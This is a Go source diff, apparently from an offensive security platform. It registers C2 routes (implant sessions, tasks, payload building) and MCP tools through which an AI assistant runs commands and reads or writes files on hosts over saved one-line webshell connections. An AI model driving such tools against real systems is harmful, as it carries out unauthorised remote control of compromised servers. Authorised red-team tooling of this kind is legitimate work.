c2Routes.POST("/listeners/:id/start", c2Handler.StartListener) + c2Routes.POST("/listeners/:id/stop", c2Handler.StopListener) + c2Routes.GET("/sessions", c2Handler.ListSessions) + c2Routes.DELETE("/sessions", c2Handler.DeleteSessions) + c2Routes.GET("/sessions/:id", c2Handler.GetSession) + c2Routes.DELETE("/sessions/:id", c2Handler.DeleteSession) + c2Routes.PUT("/sessions/:id/sleep", c2Handler.SetSessionSleep) + c2Routes.PUT("/sessions/:id/note", c2Handler.SetSessionNote) + c2Routes.GET("/tasks", c2Handler.ListTasks) + c2Routes.DELETE("/tasks", c2Handler.DeleteTasks) + c2Routes.GET("/tasks/:id", c2Handler.GetTask) + c2Routes.POST("/tasks", c2Handler.CreateTask) + c2Routes.POST("/tasks/:id/cancel", c2Handler.CancelTask) + c2Routes.GET("/tasks/:id/wait", c2Handler.WaitTask) + c2Routes.POST("/sessions/:id/tasks", c2Handler.CreateTask) + c2Routes.POST("/payloads/oneliner", c2Handler.PayloadOneliner) + c2Routes.POST("/payloads/build", c2Handler.PayloadBuild) + c2Routes.GET("/payloads/:id/download", c2Handler.PayloadDownload) + c2Routes.GET("/events", c2Handler.ListEvents) + c2Routes.DELETE("/events", c2Handler.DeleteEvents) + c2Routes.GET("/events/stream", c2Handler.EventStream) + c2Routes.POST("/files/upload", c2Handler.UploadFileForImplant) + c2Routes.GET("/files", c2Handler.ListFiles) + c2Routes.GET("/tasks/:id/result-file", c2Handler.DownloadResultFile) + c2Routes.GET("/profiles", c2Handler.ListProfiles) + c2Routes.GET("/profiles/:id", c2Handler.GetProfile) + c2Routes.POST("/profiles", c2Handler.CreateProfile) + c2Routes.PUT("/profiles/:id", c2Handler.UpdateProfile) + c2Routes.DELETE("/profiles/:id", c2Handler.DeleteProfile) + + // 对话附件(chat_uploads)管理 + protected.GET("/chat-uploads", chatUploadsHandler.List) + protected.GET("/chat-uploads/export", chatUploadsHandler.Export) + protected.GET("/chat-uploads/download", chatUploadsHandler.Download) + protected.GET("/chat-uploads/path", chatUploadsHandler.ResolvePath) + protected.GET("/chat-uploads/content", chatUploadsHandler.GetContent) + protected.POST("/chat-uploads", chatUploadsHandler.Upload) + protected.POST("/chat-uploads/mkdir", chatUploadsHandler.Mkdir) + protected.DELETE("/chat-uploads", chatUploadsHandler.Delete) + protected.PUT("/chat-uploads/rename", chatUploadsHandler.Rename) + protected.PUT("/chat-uploads/content", chatUploadsHandler.PutContent) + + // 角色管理 + protected.GET("/roles", roleHandler.GetRoles) + protected.GET("/roles/:name", roleHandler.GetRole) + protected.POST("/roles", roleHandler.CreateRole) + protected.PUT("/roles/:name", roleHandler.UpdateRole) + protected.DELETE("/roles/:name", roleHandler.DeleteRole) + + // 工作流定义(图结构固定,业务字段保存在 graph_json 中) + protected.GET("/workflows/runs/pending", workflowHandler.ListPendingRuns) + protected.GET("/workflows/runs/:runId/replay", workflowHandler.ReplayRun) + protected.GET("/workflows/runs/:runId", workflowHandler.GetRun) + protected.POST("/workflows/runs/:runId/resume", workflowHandler.ResumeRun) + protected.POST("/workflows/validate", workflowHandler.Validate) + protected.POST("/workflows/dry-run", workflowHandler.DryRun) + protected.POST("/workflows/generate-draft", workflowHandler.GenerateDraft) + protected.GET("/workflows/:id/package", workflowHandler.ExportPackage) + protected.POST("/workflow-package-inspections", workflowHandler.CreatePackageInspection) + protected.GET("/workflow-package-inspections/:inspectionId", workflowHandler.GetPackageInspection) + protected.POST("/workflow-package-imports", workflowHandler.ApplyPackageImport) + protected.GET("/workflow-package-imports/:importId", workflowHandler.GetPackageImport) + protected.GET("/workflows", workflowHandler.List) + protected.GET("/workflows/:id", workflowHandler.Get) + protected.POST("/workflows", workflowHandler.Create) + protected.PUT("/workflows/:id", workflowHandler.Update) + protected.DELETE("/workflows/:id", workflowHandler.Delete) + + // Skills管理(具体路径需注册在 /skills/:name 之前) + protected.GET("/skills", skillsHandler.GetSkills) + protected.GET("/skills/stats", skillsHandler.GetSkillStats) + protected.DELETE("/skills/stats", skillsHandler.ClearSkillStats) + protected.GET("/skills/:name/files", skillsHandler.ListSkillPackageFiles) + protected.GET("/skills/:name/file", skillsHandler.GetSkillPackageFile) + protected.PUT("/skills/:name/file", skillsHandler.PutSkillPackageFile) + protected.GET("/skills/:name/bound-roles", skillsHandler.GetSkillBoundRoles) + protected.POST("/skills", skillsHandler.CreateSkill) + protected.PUT("/skills/:name", skillsHandler.UpdateSkill) + protected.DELETE("/skills/:name", skillsHandler.DeleteSkill) + protected.DELETE("/skills/:name/stats", skillsHandler.ClearSkillStatsByName) + protected.GET("/skills/:name", skillsHandler.GetSkill) + + // MCP端点 + protected.POST("/mcp", func(c *gin.Context) { + mcpServer.HandleHTTP(c.Writer, c.Request) + }) + + // OpenAPI结果聚合端点(可选,用于获取对话的完整结果) + protected.GET("/conversations/:id/results", openAPIHandler.GetConversationResults) + } + + // OpenAPI规范(需要认证,避免暴露API结构信息) + protected.GET("/openapi/spec", openAPIHandler.GetOpenAPISpec) + + // API文档页面(公开访问,但需要登录后才能使用API) + router.GET("/api-docs", func(c *gin.Context) { + c.HTML(http.StatusOK, "api-docs.html", nil) + }) + + // 静态文件 + router.Static("/static", "./web/static") + router.LoadHTMLGlob("web/templates/*") + + // 前端页面 + router.GET("/", func(c *gin.Context) { + version := app.config.Version + if version == "" { + version = "v1.0.0" + } + c.HTML(http.StatusOK, "index.html", gin.H{"Version": version}) + }) +} + +// registerWebshellTools 注册 WebShell 相关 MCP 工具,供 AI 助手在指定连接上执行命令与文件操作 +func registerWebshellTools(mcpServer *mcp.Server, db *database.DB, webshellHandler *handler.WebShellHandler, logger *zap.Logger) { + if db == nil || webshellHandler == nil { + logger.Warn("跳过 WebShell 工具注册:db 或 webshellHandler 为空") + return + } + + // webshell_exec + execTool := mcp.Tool{ + Name: builtin.ToolWebshellExec, + Description: "在指定的 WebShell 连接上执行一条系统命令,返回命令的标准输出。connection_id 由用户在 AI 助手上下文中选定。", + ShortDescription: "在 WebShell 连接上执行命令", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "connection_id": map[string]interface{}{ + "type": "string", + "description": "WebShell 连接 ID(如 ws_xxx)", + }, + "command": map[string]interface{}{ + "type": "string", + "description": "要执行的系统命令", + }, + }, + "required": []string{"connection_id", "command"}, + }, + } + execHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + cid, _ := args["connection_id"].(string) + cmd, _ := args["command"].(string) + if cid == "" || cmd == "" { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "connection_id 和 command 均为必填"}}, IsError: true}, nil + } + conn, err := db.GetWebshellConnection(cid) + if err != nil || conn == nil { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "未找到该 WebShell 连接或查询失败"}}, IsError: true}, nil + } + output, ok, errMsg := webshellHandler.ExecWithConnection(conn, cmd) + if errMsg != "" { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: errMsg}}, IsError: true}, nil + } + if !ok { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "HTTP 非 200,输出:\n" + output}}, IsError: false}, nil + } + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: output}}, IsError: false}, nil + } + mcpServer.RegisterTool(execTool, execHandler) + + // webshell_file_list + listTool := mcp.Tool{ + Name: builtin.ToolWebshellFileList, + Description: "在指定 WebShell 连接上列出目录内容。path 默认为当前目录(.)。", + ShortDescription: "在 WebShell 上列出目录", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "connection_id": map[string]interface{}{"type": "string", "description": "WebShell 连接 ID"}, + "path": map[string]interface{}{"type": "string", "description": "目录路径,默认 ."}, + }, + "required": []string{"connection_id"}, + }, + } + listHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + cid, _ := args["connection_id"].(string) + path, _ := args["path"].(string) + if cid == "" { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "connection_id 必填"}}, IsError: true}, nil + } + conn, err := db.GetWebshellConnection(cid) + if err != nil || conn == nil { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "未找到该 WebShell 连接"}}, IsError: true}, nil + } + output, ok, errMsg := webshellHandler.FileOpWithConnection(conn, "list", path, "", "") + if errMsg != "" { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: errMsg}}, IsError: true}, nil + } + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: output}}, IsError: !ok}, nil + } + mcpServer.RegisterTool(listTool, listHandler) + + // webshell_file_read + readTool := mcp.Tool{ + Name: builtin.ToolWebshellFileRead, + Description: "在指定 WebShell 连接上读取文件内容。", + ShortDescription: "在 WebShell 上读取文件", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "connection_id": map[string]interface{}{"type": "string", "description": "WebShell 连接 ID"}, + "path": map[string]interface{}{"type": "string", "description": "文件路径"}, + }, + "required": []string{"connection_id", "path"}, + }, + } + readHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + cid, _ := args["connection_id"].(string) + path, _ := args["path"].(string) + if cid == "" || path == "" { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "connection_id 和 path 必填"}}, IsError: true}, nil + } + conn, err := db.GetWebshellConnection(cid) + if err != nil || conn == nil { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "未找到该 WebShell 连接"}}, IsError: true}, nil + } + output, ok, errMsg := webshellHandler.FileOpWithConnection(conn, "read", path, "", "") + if errMsg != "" { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: errMsg}}, IsError: true}, nil + } + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: output}}, IsError: !ok}, nil + } + mcpServer.RegisterTool(readTool, readHandler) + + // webshell_file_write + writeTool := mcp.Tool{ + Name: builtin.ToolWebshellFileWrite, + Description: "在指定 WebShell 连接上写入文件内容(会覆盖已有文件)。", + ShortDescription: "在 WebShell 上写入文件", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "connection_id": map[string]interface{}{"type": "string", "description": "WebShell 连接 ID"}, + "path": map[string]interface{}{"type": "string", "description": "文件路径"}, + "content": map[string]interface{}{"type": "string", "description": "要写入的内容"}, + }, + "required": []string{"connection_id", "path", "content"}, + }, + } + writeHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + cid, _ := args["connection_id"].(string) + path, _ := args["path"].(string) + content, _ := args["content"].(string) + if cid == "" || path == "" { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "connection_id 和 path 必填"}}, IsError: true}, nil + } + conn, err := db.GetWebshellConnection(cid) + if err != nil || conn == nil { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "未找到该 WebShell 连接"}}, IsError: true}, nil + } + output, ok, errMsg := webshellHandler.FileOpWithConnection(conn, "write", path, content, "") + if errMsg != "" { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: errMsg}}, IsError: true}, nil + } + if !ok { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "写入可能失败,输出:\n" + output}}, IsError: false}, nil + } + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "写入成功\n" + output}}, IsError: false}, nil + } + mcpServer.RegisterTool(writeTool, writeHandler) + + logger.Debug("WebShell 工具注册成功") +} + +// registerWebshellManagementTools 注册 WebShell 连接管理 MCP 工具 +func registerWebshellManagementTools(mcpServer *mcp.Server, db *database.DB, webshellHandler *handler.WebShellHandler, logger *zap.Logger) { + if db == nil { + logger.Warn("跳过 WebShell 管理工具注册:db 为空") + return + } + projectIDFromToolArgs := func(ctx context.Context, args map[string]interface{}) string { + projectID, _ := args["project_id"].(string) + projectID = strings.TrimSpace(projectID) + if projectID == "" { + projectID = strings.TrimSpace(mcp.MCPProjectIDFromContext(ctx)) + } + return projectID + } + explicitProjectIDFromToolArgs := func(args map[string]interface{}) string { + projectID, _ := args["project_id"].(string) + return strings.TrimSpace(projectID) + } + authorizeWebshellToolProject := func(principal authctx.Principal, permission, projectID string) *mcp.ToolResult { + projectID = strings.TrimSpace(projectID) + if projectID == "" { + return nil + } + if projectID == database.ProjectFilterUnbound { + return nil + } + if !db.UserCanAccessResource(principal.UserID, principal.ScopeFor(permission), "project", projectID) { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "无权访问项目: " + projectID}}, + IsError: true, + } + } + return nil + } + + // manage_webshell_list - 列出所有 webshell 连接 + listTool := mcp.Tool{ + Name: builtin.ToolManageWebshellList, + Description: "列出已保存的 WebShell 连接,返回连接ID、URL、类型、所属项目、备注等信息。默认按当前对话项目边界过滤:项目对话看本项目,未绑定项目的对话看未绑定连接;显式传 project_id 时按指定项目过滤。", + ShortDescription: "列出所有 WebShell 连接", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "project_id": map[string]interface{}{ + "type": "string", + "description": "项目 ID;不填时在项目会话中默认使用当前项目。", + }, + }, + }, + } + listHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + connections := []database.WebShellConnection{} + var err error + if principal, ok := authctx.PrincipalFromContext(ctx); ok { + projectID := explicitProjectIDFromToolArgs(args) + if projectID == "" { + projectID = mcpEffectiveProjectFilter(ctx, db) + } + if result := authorizeWebshellToolProject(principal, "webshell:read", projectID); result != nil { + return result, nil + } + connections, err = db.ListWebshellConnectionsForAccess(principal.UserID, principal.ScopeFor("webshell:read"), projectID) + } else { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "缺少认证身份"}}, IsError: true}, nil + } + if err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "获取连接列表失败: " + err.Error()}}, + IsError: true, + }, nil + } + if len(connections) == 0 { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "暂无 WebShell 连接"}}, + IsError: false, + }, nil + } + var sb strings.Builder + sb.WriteString(fmt.Sprintf("找到 %d 个 WebShell 连接:\n\n", len(connections))) + for _, conn := range connections { + sb.WriteString(fmt.Sprintf("ID: %s\n", conn.ID)) + sb.WriteString(fmt.Sprintf(" URL: %s\n", conn.URL)) + sb.WriteString(fmt.Sprintf(" 类型: %s\n", conn.Type)) + sb.WriteString(fmt.Sprintf(" 请求方式: %s\n", conn.Method)) + sb.WriteString(fmt.Sprintf(" 命令参数: %s\n", conn.CmdParam)) + if conn.ProjectID != "" { + sb.WriteString(fmt.Sprintf(" 项目ID: %s\n", conn.ProjectID)) + } else { + sb.WriteString(" 项目: 未绑定\n") + } + if conn.Remark != "" { + sb.WriteString(fmt.Sprintf(" 备注: %s\n", conn.Remark)) + } + sb.WriteString(fmt.Sprintf(" 创建时间: %s\n", conn.CreatedAt.Format("2006-01-02 15:04:05"))) + sb.WriteString("\n") + } + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: sb.String()}}, + IsError: false, + }, nil + } + mcpServer.RegisterTool(listTool, listHandler) + + // manage_webshell_add - 添加新的 webshell 连接 + addTool := mcp.Tool{ + Name: builtin.ToolManageWebshellAdd, + Description: "添加新的 WebShell 连接到管理系统。支持 PHP、ASP、ASPX、JSP 等类型的一句话木马。", + ShortDescription: "添加 WebShell 连接", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "url": map[string]interface{}{ + "type": "string", + "description": "Shell 地址,如 http://target.com/shell.php(必填)", + }, + "password": map[string]interface{}{ + "type": "string", + "description": "连接密码/密钥,如冰蝎/蚁剑的连接密码", + }, + "type": map[string]interface{}{ + "type": "string", + "description": "Shell 类型:php、asp、aspx、jsp,默认为 php", + "enum": []string{"php", "asp", "aspx", "jsp"}, + }, + "method": map[string]interface{}{ + "type": "string", + "description": "请求方式:GET 或 POST,默认为 POST", + "enum": []string{"GET", "POST"}, + }, + "cmd_param": map[string]interface{}{ + "type": "string", + "description": "命令参数名,不填默认为 cmd", + }, + "remark": map[string]interface{}{ + "type": "string", + "description": "备注,便于识别的备注名", + }, + }, + "required": []string{"url"}, + }, + } + addHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + urlStr, _ := args["url"].(string) + if urlStr == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "错误: url 参数必填"}}, + IsError: true, + }, nil + } + + password, _ := args["password"].(string) + shellType, _ := args["type"].(string) + if shellType == "" { + shellType = "php" + } + method, _ := args["method"].(string) + if method == "" { + method = "post" + } + cmdParam, _ := args["cmd_param"].(string) + if cmdParam == "" { + cmdParam = "cmd" + } + remark, _ := args["remark"].(string) + principal, ok := authctx.PrincipalFromContext(ctx) + if !ok { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "缺少认证身份"}}, IsError: true}, nil + } + projectID := projectIDFromToolArgs(ctx, args) + if result := authorizeWebshellToolProject(principal, "webshell:write", projectID); result != nil { + return result, nil + } + + // 生成连接ID + connID := "ws_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:12] + conn := &database.WebShellConnection{ + ID: connID, + URL: urlStr, + Password: password, + Type: strings.ToLower(shellType), + Method: strings.ToLower(method), + CmdParam: cmdParam, + Remark: remark, + ProjectID: projectID, + CreatedAt: time.Now(), + } + + if err := db.CreateWebshellConnection(conn); err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "添加 WebShell 连接失败: " + err.Error()}}, + IsError: true, + }, nil + } + _ = db.SetResourceOwner("webshell", conn.ID, principal.UserID) + _ = db.AssignResourceToUser(principal.UserID, "webshell", conn.ID) + projectLine := "项目: 未绑定" + if conn.ProjectID != "" { + projectLine = "项目ID: " + conn.ProjectID + } + + return &mcp.ToolResult{ + Content: []mcp.Content{{ + Type: "text", + Text: fmt.Sprintf("WebShell 连接添加成功!\n\n连接ID: %s\nURL: %s\n类型: %s\n请求方式: %s\n命令参数: %s\n%s", conn.ID, conn.URL, conn.Type, conn.Method, conn.CmdParam, projectLine), + }}, + IsError: false, + }, nil + } + mcpServer.RegisterTool(addTool, addHandler) + + // manage_webshell_update - 更新 webshell 连接 + updateTool := mcp.Tool{ + Name: builtin.ToolManageWebshellUpdate, + Description: "更新已存在的 WebShell 连接信息。", + ShortDescription: "更新 WebShell 连接", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "connection_id": map[string]interface{}{ + "type": "string", + "description": "要更新的 WebShell 连接 ID(必填)", + }, + "url": map[string]interface{}{ + "type": "string", + "description": "新的 Shell 地址", + }, + "password": map[string]interface{}{ + "type": "string", + "description": "新的连接密码/密钥", + }, + "type": map[string]interface{}{ + "type": "string", + "description": "新的 Shell 类型:php、asp、aspx、jsp", + "enum": []string{"php", "asp", "aspx", "jsp"}, + }, + "method": map[string]interface{}{ + "type": "string", + "description": "新的请求方式:GET 或 POST", + "enum": []string{"GET", "POST"}, + }, + "cmd_param": map[string]interface{}{ + "type": "string", + "description": "新的命令参数名", + }, + "remark": map[string]interface{}{ + "type": "string", + "description": "新的备注", + }, + "project_id": map[string]interface{}{ + "type": "string", + "description": "新的所属项目 ID;传空字符串可取消绑定。", + }, + }, + "required": []string{"connection_id"}, + }, + } + updateHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + connID, _ := args["connection_id"].(string) + if connID == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "错误: connection_id 参数必填"}}, + IsError: true, + }, nil + } + + // 获取现有连接 + existing, err := db.GetWebshellConnection(connID) + if err != nil || existing == nil { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "未找到指定的 WebShell 连接: " + connID}}, + IsError: true, + }, nil + } + + // 更新字段(如果提供了新值) + if urlStr, ok := args["url"].(string); ok && urlStr != "" { + existing.URL = urlStr + } + if password, ok := args["password"].(string); ok { + existing.Password = password + } + if shellType, ok := args["type"].(string); ok && shellType != "" { + existing.Type = strings.ToLower(shellType) + } + if method, ok := args["method"].(string); ok && method != "" { + existing.Method = strings.ToLower(method) + } + if cmdParam, ok := args["cmd_param"].(string); ok && cmdParam != "" { + existing.CmdParam = cmdParam + } + if remark, ok := args["remark"].(string); ok { + existing.Remark = remark + } + if projectID, ok := args["project_id"].(string); ok { + projectID = strings.TrimSpace(projectID) + if projectID != "" { + principal, ok := authctx.PrincipalFromContext(ctx) + if !ok { + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: "缺少认证身份"}}, IsError: true}, nil + } + if result := authorizeWebshellToolProject(principal, "webshell:write", projectID); result != nil { + return result, nil + } + } + existing.ProjectID = projectID + } + + if err := db.UpdateWebshellConnection(existing); err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "更新 WebShell 连接失败: " + err.Error()}}, + IsError: true, + }, nil + } + + return &mcp.ToolResult{ + Content: []mcp.Content{{ + Type: "text", + Text: fmt.Sprintf("WebShell 连接更新成功!\n\n连接ID: %s\nURL: %s\n类型: %s\n请求方式: %s\n命令参数: %s\n项目ID: %s\n备注: %s", existing.ID, existing.URL, existing.Type, existing.Method, existing.CmdParam, existing.ProjectID, existing.Remark), + }}, + IsError: false, + }, nil + } + mcpServer.RegisterTool(updateTool, updateHandler) + + // manage_webshell_delete - 删除 webshell 连接 + deleteTool := mcp.Tool{ + Name: builtin.ToolManageWebshellDelete, + Description: "删除指定的 WebShell 连接。", + ShortDescription: "删除 WebShell 连接", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "connection_id": map[string]interface{}{ + "type": "string", + "description": "要删除的 WebShell 连接 ID(必填)", + }, + }, + "required": []string{"connection_id"}, + }, + } + deleteHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + connID, _ := args["connection_id"].(string) + if connID == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "错误: connection_id 参数必填"}}, + IsError: true, + }, nil + } + + if err := db.DeleteWebshellConnection(connID); err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "删除 WebShell 连接失败: " + err.Error()}}, + IsError: true, + }, nil + } + + return &mcp.ToolResult{ + Content: []mcp.Content{{ + Type: "text", + Text: fmt.Sprintf("WebShell 连接 %s 已成功删除", connID), + }}, + IsError: false, + }, nil + } + mcpServer.RegisterTool(deleteTool, deleteHandler) + + // manage_webshell_test - 测试 webshell 连接 + testTool := mcp.Tool{ + Name: builtin.ToolManageWebshellTest, + Description: "测试指定的 WebShell 连接是否可用,会尝试执行一个简单的命令(如 whoami 或 dir)。", + ShortDescription: "测试 WebShell 连接", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "connection_id": map[string]interface{}{ + "type": "string", + "description": "要测试的 WebShell 连接 ID(必填)", + }, + "command": map[string]interface{}{ + "type": "string", + "description": "测试命令,默认为 whoami(Linux)或 dir(Windows)", + }, + }, + "required": []string{"connection_id"}, + }, + } + testHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + connID, _ := args["connection_id"].(string) + if connID == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "错误: connection_id 参数必填"}}, + IsError: true, + }, nil + } + + // 获取连接 + conn, err := db.GetWebshellConnection(connID) + if err != nil || conn == nil { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: "未找到指定的 WebShell 连接: " + connID}}, + IsError: true, + }, nil + } + + // 确定测试命令 + testCmd, _ := args["command"].(string) + if testCmd == "" { + // 根据 shell 类型选择默认命令 + if conn.Type == "asp" || conn.Type == "aspx" { + testCmd = "dir" + } else { + testCmd = "whoami" + } + } + + // 执行测试命令 + output, ok, errMsg := webshellHandler.ExecWithConnection(conn, testCmd) + if errMsg != "" { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: fmt.Sprintf("连接测试失败!\n\n连接ID: %s\nURL: %s\n错误: %s", connID, conn.URL, errMsg)}}, + IsError: true, + }, nil + } + + if !ok { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: fmt.Sprintf("连接测试失败!HTTP 非 200\n\n连接ID: %s\nURL: %s\n输出: %s", connID, conn.URL, output)}}, + IsError: true, + }, nil + } + + return &mcp.ToolResult{ + Content: []mcp.Content{{ + Type: "text", + Text: fmt.Sprintf("连接测试成功!\n\n连接ID: %s\nURL: %s\n类型: %s\n\n测试命令: %s\n输出结果:\n%s", connID, conn.URL, conn.Type, testCmd, output), + }}, + IsError: false, + }, nil + } + mcpServer.RegisterTool(testTool, testHandler) + + logger.Debug("WebShell 管理工具注册成功") +} + +// initializeKnowledge 初始化知识库组件(用于动态初始化) +func initializeKnowledge( + cfg *config.Config, + db *database.DB, + knowledgeDBConn *database.DB, + mcpServer *mcp.Server, + agentHandler *handler.AgentHandler, + app *App, // 传递 App 引用以便更新知识库组件 + logger *zap.Logger, +) (*handler.KnowledgeHandler, error) { + // 确定知识库数据库路径 + knowledgeDBPath := cfg.Database.KnowledgeDBPath + var knowledgeDB *sql.DB + + if knowledgeDBPath != "" { + // 使用独立的知识库数据库 + // 确保目录存在 + if err := os.MkdirAll(filepath.Dir(knowledgeDBPath), 0755); err != nil { + return nil, fmt.Errorf("创建知识库数据库目录失败: %w", err) + } + + var err error + knowledgeDBConn, err = database.NewKnowledgeDB(knowledgeDBPath, logger) + if err != nil { + return nil, fmt.Errorf("初始化知识库数据库失败: %w", err) + } + knowledgeDB = knowledgeDBConn.DB + logger.Info("使用独立的知识库数据库", zap.String("path", knowledgeDBPath)) + } else { + // 向后兼容:使用会话数据库 + knowledgeDB = db.DB + logger.Info("使用会话数据库存储知识库数据(建议配置knowledge_db_path以分离数据)") + } + + // 创建知识库管理器 + knowledgeManager := knowledge.NewManager(knowledgeDB, cfg.Knowledge.BasePath, logger) + + // 创建嵌入器 + // 使用OpenAI配置的API Key(如果知识库配置中没有指定) + if cfg.Knowledge.Embedding.APIKey == "" { + cfg.Knowledge.Embedding.APIKey = cfg.OpenAI.APIKey + } + if cfg.Knowledge.Embedding.BaseURL == "" { + cfg.Knowledge.Embedding.BaseURL = cfg.OpenAI.BaseURL + } + + embedder, err := knowledge.NewEmbedder(context.Background(), &cfg.Knowledge, &cfg.OpenAI, logger) + if err != nil { + return nil, fmt.Errorf("初始化知识库嵌入器失败: %w", err) + } + + // 创建检索器(Eino MultiQuery + 重排流水线) + retrievalConfig := knowledge.RetrievalConfigFromYAML(cfg.Knowledge.Retrieval) + knowledgeRetriever := knowledge.NewRetriever(knowledgeDB, embedder, retrievalConfig, logger) + if err := knowledge.WireRetrieverPipeline(context.Background(), knowledgeRetriever, &cfg.OpenAI); err != nil { + return nil, fmt.Errorf("初始化知识库检索流水线失败: %w", err) + } + + // 创建索引器(Eino Compose 链) + knowledgeIndexer, err := knowledge.NewIndexer(context.Background(), knowledgeDB, embedder, logger, &cfg.Knowledge) + if err != nil { + return nil, fmt.Errorf("初始化知识库索引器失败: %w", err) + } + + // 注册知识检索工具到MCP服务器 + knowledge.RegisterKnowledgeTool(mcpServer, knowledgeRetriever, knowledgeManager, logger) + + // 创建知识库API处理器 + knowledgeHandler := handler.NewKnowledgeHandler(knowledgeManager, knowledgeRetriever, knowledgeIndexer, db, logger) + if app != nil && app.auditSvc != nil { + knowledgeHandler.SetAudit(app.auditSvc) + } + logger.Info("知识库模块初始化完成", zap.Bool("handler_created", knowledgeHandler != nil)) + + // 设置知识库管理器到AgentHandler以便记录检索日志 + agentHandler.SetKnowledgeManager(knowledgeManager) + + // 更新 App 中的知识库组件(如果 App 不为 nil,说明是动态初始化) + if app != nil { + app.knowledgeManager = knowledgeManager + app.knowledgeRetriever = knowledgeRetriever + app.knowledgeIndexer = knowledgeIndexer + app.knowledgeHandler = knowledgeHandler + // 如果使用独立数据库,更新 knowledgeDB + if knowledgeDBPath != "" { + app.knowledgeDB = knowledgeDBConn + } + logger.Info("App 中的知识库组件已更新") + } + + // 扫描知识库并建立索引(异步) + go func() { + itemsToIndex, err := knowledgeManager.ScanKnowledgeBase() + if err != nil { + logger.Warn("扫描知识库失败", zap.Error(err)) + return + } + + // 检查是否已有索引 + hasIndex, err := knowledgeIndexer.HasIndex() + if err != nil { + logger.Warn("检查索引状态失败", zap.Error(err)) + return + } + + if hasIndex { + // 如果已有索引,只索引新添加或更新的项 + if len(itemsToIndex) > 0 { + logger.Info("检测到已有知识库索引,开始增量索引", zap.Int("count", len(itemsToIndex))) + ctx := context.Background() + consecutiveFailures := 0 + var firstFailureItemID string + var firstFailureError error + failedCount := 0 + + for _, itemID := range itemsToIndex { + if err := knowledgeIndexer.IndexItem(ctx, itemID); err != nil { + failedCount++ + consecutiveFailures++ + + if consecutiveFailures == 1 { + firstFailureItemID = itemID + firstFailureError = err + logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err)) + } + + // 如果连续失败2次,立即停止增量索引 + if consecutiveFailures >= 2 { + logger.Error("连续索引失败次数过多,立即停止增量索引", + zap.Int("consecutiveFailures", consecutiveFailures), + zap.Int("totalItems", len(itemsToIndex)), + zap.String("firstFailureItemId", firstFailureItemID), + zap.Error(firstFailureError), + ) + break + } + continue + } + + // 成功时重置连续失败计数 + if consecutiveFailures > 0 { + consecutiveFailures = 0 + firstFailureItemID = "" + firstFailureError = nil + } + } + logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)), zap.Int("failedCount", failedCount)) + } else { + logger.Info("检测到已有知识库索引,没有需要索引的新项或更新项") + } + return + } + + // 冷启动:仅为尚无向量的知识项构建索引(与 IndexMissing 语义一致) + logger.Info("未检测到知识库索引,开始自动构建索引") 